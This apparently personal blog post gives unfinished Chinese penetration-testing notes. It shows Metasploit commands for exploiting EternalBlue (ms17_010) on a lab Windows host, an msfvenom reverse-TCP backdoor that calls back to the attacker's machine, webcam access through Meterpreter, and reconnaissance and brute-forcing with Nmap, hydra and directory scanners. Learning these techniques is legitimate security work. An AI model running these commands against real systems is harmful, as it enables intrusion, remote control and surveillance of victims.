kali渗透测试(未完结)
渗透测试
1.1 kail安装
1.2 msf和永恒之蓝
-
msf:metaspoilt
-
永恒之蓝 windows 17年以前的版本均含有该漏洞
1.3 msf攻击永恒之蓝
-
进入msf:
1
msfconsole
-
搜索永恒之蓝模块
1
search ms17_010
-
使用模块
1
use id/name
-
查看设置选项
1
2show options
options -
测试与windows连通性
注意关闭防火墙
1
ping 192.168.179.132
-
设置RHOST(攻击目标主机)等必选项**
1
set RHOST 192.168.179.132
-
payload设置默认即可
- LHOST:监听地址(kali本机ip)
- LPORT:监听端口
-
运行
1
run
-
metteroreter:后渗透模块
-
msfvenom生成远控木马(shell中)
-
用来生成后门的软件,在目标机上执行后门,在本地监听上线
-
windows可执行程序后门
1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.179.135 lport=9999 -f exe -o demo.exe
- -p payload:系统/架构/作用/方式
- lhost:监听地址
- lport:监听端口
- -f format:输出格式
- -o output:输出文件
-
开启监听
1
2
3
4
5use exploit/mutil/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.179.135
set lport 9999
run -
打开摄像头(依据权限)
1
meterpreter > webcam_stream
-
2.1 域名信息收集
-
查询注册人
1
whois 域名
-
备案信息查询
1
icp.chinaz.com
2.2 子域名查询
1 | google高级搜索语法 |
网络空间安全搜索引擎:fofa.so
3.1 IP信息收集
- ip.chinaz.com
- ping.chinaz.com 判断是否开启CDN
- 绕过CDN
- MX邮件记录
- DNS记录
- Nmap C段存活主机探测
3.2 端口信息收集
- FTP 21 传输控制信息;20传输数据
- ftp基础爆破:bruter hydra msf中模块
- SSH 22
- Telnet 23
- SMTP 25/465
- WWW 80
- NetBIOS SessionService 139/445 文件和打印机共享
- MySQL 3306数据库监听端口
- RDP-3389 远程桌面服务
- Redis 6379 日志型数据库
Nmap端口扫描:官网有中文文档
1 | nmap -sn -v -T4 -oG Discovery.gnmap 192.168.179.0/24 |
3.3 其他信息收集
- WooYun.org等
- 社会工程学
4.1 网站指纹识别
-
ping
-
nmap -O -Pn -T4 -A 192.168.179.0/24
-
插件 /开发者工具
-
CMS(内容管理系统)识别:在线识别工具
4.2 敏感文件和目录探测
敏感文件:常见隐藏文件:github、DS_STORE等
- git泄漏:项目githack
- svn泄漏
目录探测:御剑、dirsearch
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 lzhのBLOG!